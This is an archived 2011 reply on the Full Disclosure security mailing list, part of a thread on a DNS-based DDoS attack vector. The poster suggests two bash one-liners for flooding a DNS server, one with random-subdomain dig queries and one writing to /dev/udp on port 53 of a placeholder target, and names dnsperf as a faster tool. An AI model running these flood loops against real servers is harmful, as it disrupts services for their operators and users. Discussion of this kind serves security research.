Full Disclosure mailing list archives
Re: New DDoS attack vector
From: Balder <balder.theglorious () googlemail com>
Date: Fri, 20 May 2011 16:08:05 +0200
On 20 May 2011 13:35, Kristian Erik Hermansen <kristian.hermansen () gmail com> wrote:
On Fri, May 20, 2011 at 4:29 AM, Balder <balder.theglorious () googlemail com> wrote:* Why go to all this trouble when you could just do something like the following (replacing dig with something faster) - while true ; do dig $(</dev/urandom tr -dc A-Za-z0-9 | head -c 10 ).example.com MX ; donednsperf is what you really want ;)
even the following if if there is no IDS and if there is you would probably have just as much chance of overloading its state table then the dns server while true ; do echo /dev/urandom > /dev/udp/target_IP_address/53 ; done thanks to /dev/random http://blog.rootshell.be/2011/05/05/binbash-phone-home/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- New DDoS attack vector minor float (May 19)
- Re: New DDoS attack vector joris dedieu (May 19)
- Re: New DDoS attack vector Dobbins, Roland (May 19)
- Re: New DDoS attack vector Kristian Erik Hermansen (May 20)
- Re: New DDoS attack vector Balder (May 20)
- Re: New DDoS attack vector Kristian Erik Hermansen (May 20)
- Re: New DDoS attack vector Balder (May 20)
- Re: New DDoS attack vector minor float (May 20)
- Re: New DDoS attack vector Balder (May 20)
- Re: New DDoS attack vector Kristian Erik Hermansen (May 20)
- Message not available
- Re: New DDoS attack vector ascii (May 20)
- Re: New DDoS attack vector minor float (May 20)
- Re: New DDoS attack vector Dobbins, Roland (May 20)
- Message not available
- Re: New DDoS attack vector ascii (May 20)